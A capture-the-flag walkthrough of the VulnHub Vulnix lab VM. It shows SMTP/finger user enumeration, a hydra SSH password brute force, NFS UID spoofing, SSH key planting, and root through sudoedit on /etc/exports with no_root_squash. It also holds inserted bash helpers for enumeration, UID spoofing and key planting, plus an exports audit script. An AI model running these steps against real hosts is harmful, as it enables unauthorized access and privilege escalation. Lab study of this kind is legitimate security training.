VulnHub — Vulnix

Raj Singh
10 min read · Oct 16, 2019

Nmap

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2019-10-16T11:55:10+00:00; -3s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL RESP-CODES TOP UIDL STLS PIPELINING CAPA
|_ssl-date: 2019-10-16T11:55:10+00:00; -3s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 36626/tcp6 mountd
| 100005 1,2,3 43733/udp6 mountd
| 100005 1,2,3 46737/tcp mountd
| 100005 1,2,3 60829/udp mountd
| 100021 1,3,4 39481/udp nlockmgr
| 100021 1,3,4 39797/tcp6 nlockmgr
| 100021 1,3,4 40801/tcp nlockmgr
| 100021 1,3,4 46294/udp6 nlockmgr
| 100024 1 34603/udp status
| 100024 1 36114/tcp status
| 100024 1 49520/udp6 status
| 100024 1 51984/tcp6 status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: listed STARTTLS ENABLE capabilities LOGIN-REFERRALS have more IMAP4rev1 SASL-IR post-login Pre-login LOGINDISABLEDA0001 OK IDLE ID LITERAL+
|_ssl-date: 2019-10-16T11:55:11+00:00; -2s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open shell Netkit rshd
993/tcp open ssl/imaps?
|_ssl-date: 2019-10-16T11:55:10+00:00; -3s from scanner time.
995/tcp open ssl/pop3s?
|_ssl-date: 2019-10-16T11:55:10+00:00; -3s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
36114/tcp open status 1 (RPC #100024)
40801/tcp open nlockmgr 1-4 (RPC #100021)
43232/tcp open mountd 1-3 (RPC #100005)
44143/tcp open mountd 1-3 (RPC #100005)
46737/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:E9:FD:8C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32-3.10
Uptime guess: 198.842 days (since Sun Mar 31 21:14:34 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -3s
TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 10.0.0.20
NSE: Script Post-scanning.
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.30 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

The scan shows rpcbind on port 111 and NFS (the nfs and nfs_acl RPC programs, 100003 and 100227) on port 2049, so let's ask mountd which directories are exported:

showmount -e 10.0.0.20

Now mount the export on our machine (the mount point /tmp/vulnix has to exist first):

mount -t nfs 10.0.0.20:/home/vulnix /tmp/vulnix

/home/vulnix is the exported directory and it mounts without complaint, but we cannot enter it: the directory belongs to a UID/GID we do not have locally, so the permission bits deny us. NFSv3 does no authentication of its own; it trusts whatever UID the client presents, so we will come back to this share once we know the right numeric IDs. For now, let's find another way in.

Port 25 is Postfix, and its banner advertises the VRFY command, so let's enumerate users through SMTP:

smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 10.0.0.20

Two accounts come back as existing:

Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ………………… VRFY
Worker Processes ……… 5
Usernames file ……….. /usr/share/seclists/Usernames/top-usernames-shortlist.txt
Target count …………. 1
Username count ……….. 17
Target TCP port ………. 25
Query timeout ………… 5 secs
Target domain …………
######## Scan started at Wed Oct 16 22:06:40 2019 #########
10.0.0.20: root exists
10.0.0.20: user exists
######## Scan completed at Wed Oct 16 22:06:40 2019 #########
2 results.
17 queries in 1 seconds (17.0 queries / sec)

The finger service on port 79 gives us a second enumeration channel. finger-user-enum (pentestmonkey's Perl script, also mirrored on GitHub) does this with a wordlist:

perl finger-user-enum.pl -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.0.0.20

finger looks up account details on a remote machine, so every name that exists comes back with its login, home directory and shell. Here is what we get:

Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ……… 5
Usernames file ……….. /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count …………. 1
Username count ……….. 113
Target TCP port ………. 79
Query timeout ………… 5 secs
Relay Server …………. Not used
######## Scan started at Wed Oct 16 22:11:21 2019 #########
@10.0.0.20: No one logged on…
bin@10.0.0.20: Login: bin Name: bin..Directory: /bin Shell: /bin/sh..Never logged in…No mail…No Plan…
daemon@10.0.0.20: Login: daemon Name: daemon..Directory: /usr/sbin Shell: /bin/sh..Never logged in…No mail…No Plan…
backup@10.0.0.20: Login: backup Name: backup..Directory: /var/backups Shell: /bin/sh..Never logged in…No mail…No Plan…
games@10.0.0.20: Login: games Name: games..Directory: /usr/games Shell: /bin/sh..Never logged in…No mail…No Plan…
gnats@10.0.0.20: Login: gnats Name: Gnats Bug-Reporting System (admin)..Directory: /var/lib/gnats Shell: /bin/sh..Never logged in…No mail…No Plan…
irc@10.0.0.20: Login: irc Name: ircd..Directory: /var/run/ircd Shell: /bin/sh..Never logged in…No mail…No Plan…
list@10.0.0.20: Login: list Name: Mailing List Manager..Directory: /var/list Shell: /bin/sh..Never logged in…No mail…No Plan…
lp@10.0.0.20: Login: lp Name: lp..Directory: /var/spool/lpd Shell: /bin/sh..Never logged in…No mail…No Plan…
libuuid@10.0.0.20: Login: libuuid Name: ..Directory: /var/lib/libuuid Shell: /bin/sh..Never logged in…No mail…No Plan…
mail@10.0.0.20: Login: mail Name: mail..Directory: /var/mail Shell: /bin/sh..Never logged in…No mail…No Plan…..Login: dovecot Name: Dovecot mail server..Directory: /usr/lib/dovecot Shell: /bin/false..Never logged in…No mail…No Plan…
messagebus@10.0.0.20: Login: messagebus Name: ..Directory: /var/run/dbus Shell: /bin/false..Never logged in…No mail…No Plan…
news@10.0.0.20: Login: news Name: news..Directory: /var/spool/news Shell: /bin/sh..Never logged in…No mail…No Plan…
nobody@10.0.0.20: Login: nobody Name: nobody..Directory: /nonexistent Shell: /bin/sh..Never logged in…New mail received Wed Oct 16 12:47 2019 (BST).. Unread since Thu Oct 3 14:02 2019 (BST)..No Plan…
man@10.0.0.20: Login: man Name: man..Directory: /var/cache/man Shell: /bin/sh..Never logged in…No mail…No Plan…
proxy@10.0.0.20: Login: proxy Name: proxy..Directory: /bin Shell: /bin/sh..Never logged in…No mail…No Plan…
root@10.0.0.20: Login: root Name: root..Directory: /root Shell: /bin/bash..Never logged in…No mail…No Plan…
sshd@10.0.0.20: Login: sshd Name: ..Directory: /var/run/sshd Shell: /usr/sbin/nologin..Never logged in…No mail…No Plan…
sync@10.0.0.20: Login: sync Name: sync..Directory: /bin Shell: /bin/sync..Never logged in…No mail…No Plan…
sys@10.0.0.20: Login: sys Name: sys..Directory: /dev Shell: /bin/sh..Never logged in…No mail…No Plan…
syslog@10.0.0.20: Login: syslog Name: ..Directory: /home/syslog Shell: /bin/false..Never logged in…No mail…No Plan…
uucp@10.0.0.20: Login: uucp Name: uucp..Directory: /var/spool/uucp Shell: /bin/sh..Never logged in…No mail…No Plan…
user@10.0.0.20: Login: user Name: user..Directory: /home/user Shell: /bin/bash..Last login Wed Oct 16 12:21 (BST) on pts/0 from 10.0.0.1..No mail…No Plan…..Login: dovenull Name: Dovecot login user..Directory: /nonexistent Shell: /bin/false..Never logged in…No mail…No Plan…
www-data@10.0.0.20: Login: www-data Name: www-data..Directory: /var/www Shell: /bin/sh..Never logged in…No mail…No Plan…
######## Scan completed at Wed Oct 16 22:11:21 2019 #########
24 results.
113 queries in 1 seconds (113.0 queries / sec)
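What smtp-user-enum and finger-user-enum do under the hood, as an added example that is not from the original post or from pentestmonkey's tools: one SMTP VRFY probe and one finger query per candidate name, with the reply classified by SMTP status code or by the finger body. The function names, the HELO name enum.local, the default port and the wordlist format are assumptions; the reply formats are the ones Postfix and Linux fingerd produced above.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): manual user enumeration over SMTP VRFY
# and finger, mirroring what smtp-user-enum and finger-user-enum do.
# Assumed: bash (for /dev/tcp), a reachable target, and a one-name-per-line wordlist.

# Classify one SMTP reply to VRFY. Postfix on Vulnix answers "252 2.0.0 user" for
# an account that exists and "550 5.1.1 ... User unknown" for one that does not;
# a hardened server answers 502 (VRFY disabled), which ends this technique.
classify_vrfy_reply() {  # usage: classify_vrfy_reply "REPLY LINE"
    case "$1" in
        250*|252*) echo exists ;;
        550*)      echo unknown ;;
        502*)      echo disabled ;;
        *)         echo other ;;
    esac
}

# Classify a finger reply body. Linux fingerd prints "Login: <name> ..." for a real
# account and "finger: <name>: no such user." otherwise.
classify_finger_reply() {  # usage: classify_finger_reply "REPLY BODY"
    if printf '%s\n' "$1" | grep -q '^Login: '; then
        echo exists
    elif printf '%s\n' "$1" | grep -qi 'no such user'; then
        echo unknown
    else
        echo other
    fi
}

# One VRFY round trip over a raw TCP socket; prints the server's reply line.
smtp_vrfy() {  # usage: smtp_vrfy HOST USER [PORT]
    local host="$1" user="$2" port="${3:-25}" line
    exec 3<>"/dev/tcp/$host/$port" || return 1
    read -r -t 5 line <&3                       # 220 banner
    printf 'HELO enum.local\r\n' >&3            # HELO (not EHLO) keeps the reply to one line
    read -r -t 5 line <&3                       # 250 reply to HELO
    printf 'VRFY %s\r\n' "$user" >&3
    read -r -t 5 line <&3
    printf 'QUIT\r\n' >&3
    exec 3>&-
    printf '%s\n' "$line" | tr -d '\r'
}

# One finger query (RFC 1288: the name followed by CRLF); prints the reply body.
finger_query() {  # usage: finger_query HOST USER
    exec 3<>"/dev/tcp/$1/79" || return 1
    printf '%s\r\n' "$2" >&3
    cat <&3
    exec 3>&-
}

# Run both probes for every name in WORDLIST and report the hits.
enum_users() {  # usage: enum_users HOST WORDLIST
    local host="$1" name
    while read -r name; do
        [ -n "$name" ] || continue
        [ "$(classify_vrfy_reply "$(smtp_vrfy "$host" "$name")")" = exists ] \
            && echo "$name exists (smtp VRFY)"
        [ "$(classify_finger_reply "$(finger_query "$host" "$name")")" = exists ] \
            && echo "$name exists (finger)"
    done < "$2"
}
```

Against the box above, `enum_users 10.0.0.20 /usr/share/seclists/Usernames/top-usernames-shortlist.txt` would report root and user from both channels. The classifier is the part worth keeping: a 502 to VRFY (or `disable_vrfy_command = yes` in Postfix) and a disabled fingerd are the fixes that close both channels.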

Both channels agree on the same two accounts, root and user, and finger shows that user has actually logged in (root never has). Let's go after user's SSH password with hydra:

hydra -l user -P /usr/share/wordlists/rockyou.txt 10.0.0.20 ssh

Hydra finds the password for user: letmein

Log in over SSH with those credentials:

ssh user@10.0.0.20

and we have a shell as user.

Reading /etc/passwd on the box shows the vulnix account as UID/GID 2008:2008. That is all we need to get into the NFS share: the export only squashes root (see the root_squash option in /etc/exports later on), so the server honours any non-root UID the client presents. On our own machine, create a local user named vulnix and give it the same numeric IDs:

adduser vulnix

then open /etc/passwd in an editor (vim /etc/passwd) and change the new user's UID and GID to 2008 so the entry reads:

vulnix:x:2008:2008:,,,:/home/vulnix:/bin/bash
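The UID-matching step above, as an added example that is not from the original post: read the owner of the mounted share, pull the same IDs for a name out of a passwd-format file, and print the useradd command that creates a matching local account. The function names, the useradd flags and the sample passwd lines are assumptions made for the example.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): impersonate a non-root NFS user by
# giving a local account the same numeric UID/GID. root_squash only remaps UID 0,
# so any other UID the client presents is honoured by the server as-is.
# Assumed: the share is already mounted at MOUNTPOINT; the useradd(8) flags are a choice.

# Print "uid:gid" of the mounted share's top directory (its owner on the server).
share_owner() {  # usage: share_owner MOUNTPOINT
    stat -c '%u:%g' "$1"
}

# Print "uid:gid" for NAME from a passwd(5)-format file, such as the target's
# /etc/passwd read over the SSH session as "user". Returns 1 if NAME is absent.
passwd_ids() {  # usage: passwd_ids NAME PASSWD_FILE
    awk -F: -v n="$1" '$1 == n { print $3 ":" $4; found = 1 } END { exit !found }' "$2"
}

# Print (do not run) the commands that create a local account with those IDs.
# -o allows a UID that is already taken locally; -M skips creating a home directory.
spoof_user_cmd() {  # usage: spoof_user_cmd NAME UID:GID
    local name="$1" uid="${2%%:*}" gid="${2##*:}" n
    for n in "$uid" "$gid"; do
        case "$n" in ''|*[!0-9]*) echo "bad id pair: $2" >&2; return 1 ;; esac
    done
    printf 'groupadd -g %s %s 2>/dev/null; useradd -o -M -u %s -g %s -s /bin/bash %s\n' \
        "$gid" "$name" "$uid" "$gid" "$name"
}
```

On the mounted share, `share_owner /tmp/vulnix` prints 2008:2008 straight from the directory's ownership, so the passwd lookup is only a cross-check; run the printed useradd line as root, then `su vulnix` and cd into the mount as the post does next.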

Now we can enter the mounted vulnix home directory as the local vulnix user:

└──╼ #su vulnix
vulnix@PREDATOR:/root/predator/oscp/vulnhub/vulnix$ cd /tmp/
vulnix@PREDATOR:/tmp$ cd vulnix/
vulnix@PREDATOR:/tmp/vulnix$ ls -la
total 60
drwxr-x---  5 vulnix vulnix  4096 Oct 16 17:11 .
drwxrwxrwt 20 root   root   20480 Oct 16 21:58 ..
-rw-------  1 vulnix vulnix   905 Oct  3 18:58 .bash_history
-rw-r--r--  1 vulnix vulnix   220 Apr  3  2012 .bash_logout
-rw-r--r--  1 vulnix vulnix  3486 Apr  3  2012 .bashrc
drwx------  2 vulnix vulnix  4096 Oct  3 18:30 .cache
-rw-r--r--  1 vulnix vulnix   675 Apr  3  2012 .profile
drwxr-xr-x  2 vulnix vulnix  4096 Oct  3 18:30 .ssh
drwxr-xr-x  2 vulnix vulnix  4096 Oct  3 18:26 ssh
-rw-rw-r--  1 vulnix vulnix     8 Oct 16 17:11 sudoedit
vulnix@PREDATOR:/tmp/vulnix$

There is a .ssh directory, and since the share now treats us as its owner we can write to it. Generate an SSH key pair on our machine and put the public half into vulnix's .ssh/authorized_keys so we can log in as vulnix without a password.

Create the key pair on our box (leave the passphrase empty so the key can be used without prompting):

└──╼ #ssh-keygen -f anythin
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in anythin.
Your public key has been saved in anythin.pub.
The key fingerprint is:
SHA256:GdD4S+KLFywZ13ePgO5zHtXXZQ9/16LYqpOk7Jmo8d8 root@PREDATOR
The key's randomart image is:
+---[RSA 3072]----+
| .o |
| … |
| o.. . o|
| . o =oo .. +=|
| * +So o.oo O|
| o + + +…oo|
| . + * .o o |
| o..=+= .o |
| ..o+= E*o |
+----[SHA256]-----+

This gives us two files: anythin (the private key) and anythin.pub (the public key):

┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix/ssh]
└──╼ #ls -la
total 16
drwxr-xr-x 2 root root 4096 Oct 16 22:38 .
drwxr-xr-x 4 root root 4096 Oct 16 22:37 ..
-rw------- 1 root root 2602 Oct 16 22:38 anythin
-rw-r--r-- 1 root root  567 Oct 16 22:38 anythin.pub

Now put the contents of anythin.pub into /tmp/vulnix/.ssh/authorized_keys on the mounted share, working as the local vulnix user. The post copied the one-line public key and echoed it with a > redirect, which replaces whatever authorized_keys already held (use >> instead if you want to keep existing keys):

vulnix@PREDATOR:/tmp/vulnix/.ssh$ echo "ssh-rsa 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 " > authorized_keys

The key has no passphrase, so we can now connect as vulnix using the private key file anythin:

┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix]
└──╼ #ssh -i anythin vulnix@10.0.0.20
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed Oct 16 13:51:20 BST 2019

  System load:  0.01              Processes:           103
  Usage of /:   92.0% of 773MB    Users logged in:     1
  Memory usage: 11%               IP address for eth0: 10.0.0.20
  Swap usage:   0%

  => / is using 92.0% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Last login: Wed Oct 16 12:38:57 2019 from 10.0.0.1
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
vulnix@vulnix:~$

sudo -l shows that vulnix may run sudoedit on /etc/exports as root, and without a password:

vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$

That is our path to root.

/etc/exports is the NFS server's access-control list: each line names a directory to export, which clients may mount it, and with what options. The existing /home/vulnix line uses root_squash, which maps a client's UID 0 to nobody and is exactly why we had to impersonate UID 2008 earlier. We add a line exporting /root to any host with no_root_squash, so that root on our machine is honoured as root on the server:

# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
/root *(rw,no_root_squash)

NOTE: sudoedit opens a temporary copy of the file in the default editor (nano here) and writes it back as root when you leave; press Ctrl+O to save and Ctrl+X to exit.

The new line does not take effect until the NFS server re-reads /etc/exports (exportfs -ra, or a restart of the NFS service). On this VM the change became visible on its own within two to three minutes; restarting the machine from VirtualBox makes it immediate.
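The check a defender would want here, as an added example that is not part of the original post: a small audit of an exports(5) file for the two conditions this escalation relied on, an export that any host may mount (*) and no_root_squash. The function name, the output format and the sample exports content are constructed for the example, mirroring the file shown above.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): audit an exports(5) file for the two
# settings this escalation relied on. Sample input in the usage note is constructed.
#
#   any-host        the client spec is "*", so anyone who can reach port 2049 may mount it
#   no_root_squash  UID 0 on the client is UID 0 on the server (the default root_squash
#                   maps it to nobody, which is why spoofing UID 2008 was needed earlier)
#   rw              listed for context; a read-only export with no_root_squash still leaks

# Print "PATH CLIENT (OPTIONS) -> findings" for each risky entry.
# Returns 1 if at least one risky entry was found, 0 otherwise.
audit_exports() {  # usage: audit_exports FILE
    local risky=0 path rest spec client opts findings
    set -f                                   # keep "*" from globbing while we split specs
    while read -r path rest; do
        case "$path" in ''|\#*) continue ;; esac
        for spec in $rest; do                # a line may hold several client(options) specs
            client="${spec%%\(*}"
            if [ "$spec" = "$client" ]; then
                opts=""                      # no parentheses: defaults apply (ro,root_squash)
            else
                opts="${spec#*\(}"; opts="${opts%\)}"
            fi
            findings=""
            [ "$client" = '*' ] && findings="$findings any-host"
            case ",$opts," in *,no_root_squash,*) findings="$findings no_root_squash" ;; esac
            case ",$opts," in *,rw,*)             findings="$findings rw" ;; esac
            case "$findings" in
                *any-host*|*no_root_squash*)
                    printf '%s %s (%s) ->%s\n' "$path" "$client" "$opts" "$findings"
                    risky=1 ;;
            esac
        done
    done < "$1"
    set +f
    return "$risky"
}
```

Run against the edited file above (`audit_exports /etc/exports`), it flags both lines: /home/vulnix for being mountable by any host, and /root for that plus no_root_squash. A non-zero exit makes it usable as a pre-commit or configuration-management gate.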

Check whether /root is now in the export list:

└──╼ #showmount -e 10.0.0.20
Export list for 10.0.0.20:
/root *
/home/vulnix *

/root is exported to everyone (*). Mount it on our machine as root (create /tmp/root first):

mount -t nfs 10.0.0.20:/root /tmp/root

Because the export has no_root_squash, our local root is no longer mapped to nobody, so we can list /tmp/root:

┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix]
└──╼ #cd /tmp/root/
┌─[root@PREDATOR]─[/tmp/root]
└──╼ #ls -la
total 48
drwx------  3 root root  4096 Sep  3  2012 .
drwxrwxrwt 20 root root 20480 Oct 16 21:58 ..
-rw-------  1 root root     0 Sep  3  2012 .bash_history
-rw-r--r--  1 root root  3106 Apr 19  2012 .bashrc
drwx------  2 root root  4096 Sep  2  2012 .cache
-rw-r--r--  1 root root   140 Apr 19  2012 .profile
-r--------  1 root root    33 Sep  2  2012 trophy.txt
-rw-------  1 root root   710 Sep  2  2012 .viminfo
┌─[root@PREDATOR]─[/tmp/root]
└──╼ #

root has no .ssh directory yet, so create one on the share and put our anythin.pub into authorized_keys. Files we create here are owned by root on the server, since we are UID 0 on the client and the export no longer squashes root:

mkdir .ssh
cd .ssh
echo "ssh-rsa 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" > authorized_keys

The key is planted (root's umask leaves the new .ssh directory at 755 and the file at 644, neither group- nor world-writable, which is what sshd's StrictModes checks). Now connect as root with the private key anythin:
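Both key plantings above, into vulnix's and then root's authorized_keys, used echo ... > authorized_keys, which overwrites whatever was there. As an added example that is not from the original post, this helper appends the key only if it is not already present, refuses lines that are not OpenSSH public keys, and sets the 700/600 modes that sshd's StrictModes accepts. The function names, the paths it takes and the sample key in the usage note are constructed for the example.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): append a public key to a user's
# authorized_keys without clobbering existing keys, validating the line first and
# setting modes sshd's StrictModes accepts. Paths are passed in; the sample key used
# in the usage note is constructed and authorises nothing real.

# Return 0 if LINE looks like an OpenSSH public key: "<type> <base64-blob> [comment]".
is_pubkey_line() {  # usage: is_pubkey_line LINE
    case "$1" in
        ssh-rsa\ *|ssh-ed25519\ *|ecdsa-sha2-nistp256\ *|ecdsa-sha2-nistp384\ *|ecdsa-sha2-nistp521\ *) ;;
        *) return 1 ;;
    esac
    printf '%s\n' "$1" | awk '{ print $2 }' | grep -Eq '^[A-Za-z0-9+/]+=*$'
}

# Append the key in PUBKEY_FILE to HOME_DIR/.ssh/authorized_keys unless an entry with the
# same type and blob is already there. Prints "added" or "present"; returns 1 on bad input.
plant_key() {  # usage: plant_key PUBKEY_FILE HOME_DIR
    local key dir ak ktype rest blob
    key=$(head -n 1 "$1")
    is_pubkey_line "$key" || { echo "not an OpenSSH public key: $1" >&2; return 1; }
    dir="$2/.ssh"; ak="$dir/authorized_keys"
    mkdir -p "$dir" && chmod 700 "$dir"     # StrictModes rejects group/world-writable dirs
    touch "$ak" && chmod 600 "$ak"
    ktype=${key%% *}; rest=${key#* }; blob=${rest%% *}   # compare on type+blob, ignore comment
    if awk -v t="$ktype" -v b="$blob" '$1 == t && $2 == b { found = 1 } END { exit !found }' "$ak"; then
        echo present
    else
        printf '%s\n' "$key" >> "$ak"
        echo added
    fi
}
```

On the mounted shares this would be `plant_key anythin.pub /tmp/vulnix` (as the local vulnix user) and `plant_key anythin.pub /tmp/root` (as root); running it twice prints present the second time instead of duplicating the line.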

┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix]
└──╼ #ssh -i anythin root@10.0.0.20
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed Oct 16 14:09:08 BST 2019

  System load:  0.03              Processes:           97
  Usage of /:   92.1% of 773MB    Users logged in:     1
  Memory usage: 11%               IP address for eth0: 10.0.0.20
  Swap usage:   0%

  => / is using 92.1% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Last login: Wed Oct 16 14:05:36 2019 from 10.0.0.1
root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)

root@vulnix:~# ls
trophy.txt
root@vulnix:~#

KABOOOOM 💣

We rooted the machine

………………………………….COWABUNGA…………………………………..
